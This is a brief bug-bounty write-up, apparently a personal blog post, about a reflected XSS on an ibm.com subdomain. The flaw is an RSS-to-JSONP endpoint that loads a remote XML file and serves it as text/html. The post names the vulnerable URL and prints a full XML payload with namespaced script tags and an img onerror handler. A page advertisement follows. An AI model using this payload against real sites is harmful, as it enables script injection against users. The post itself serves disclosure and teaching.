Reflected XSS by jsonp on ibm.com subdomain

#security #jsonp #xss #bugbounty

hi :D
this my write up about my bug I've found on ibm.com, first I get URLs from web.archive.org on ibm.com by using waybackurls tool and I got this URL https://www-356.ibm.com/partnerworld/wps/servlet/pwdyn/pw/rss/rsstojson.jsp?ccdb=no&rssurl=https://www-2000.ibm.com/file.xml&_=1596170198353
this endpoint include XML file via rssurl parameter and covert the content from XML to jsonp

but in headers, content-type: text/html, this allowed to execute HTML tags in this page , so I've created an XML file with XSS payload and upload it on my website https://knassar702.github.io/xss.xml
and add the link of the file in rssurl parameter

<html>
        <head></head>
        <body>
                <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
                <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
                <info>
                  <name>
                    <value><![CDATA[<img src=x onerror=confirm(document.domain)>]]></value>
                  </name>
                    <description>
                      <value>Hello</value>
                    </description>
                    <url>
                      <value>http://google.com</value>
                    </url>
                </info>
        </body>
</html>

Done :D

Speedy emails, satisfied customers

Are delayed transactional emails costing you user satisfaction? Postmark delivers your emails almost instantly, keeping your customers happy and connected.